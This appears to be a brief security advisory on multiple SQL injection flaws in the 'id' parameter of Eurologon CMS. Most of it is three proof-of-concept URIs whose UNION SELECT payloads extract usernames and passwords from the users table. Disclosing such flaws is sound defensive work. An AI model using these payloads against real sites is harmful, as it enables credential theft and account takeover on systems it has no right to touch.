Eurologon CMS ID Parameter Multiple SQL Injection Vulnerabilities

Eurologon CMS ID Parameter Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/reviews.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*
http://www.example.com/links.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*
http://www.example.com/articles.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*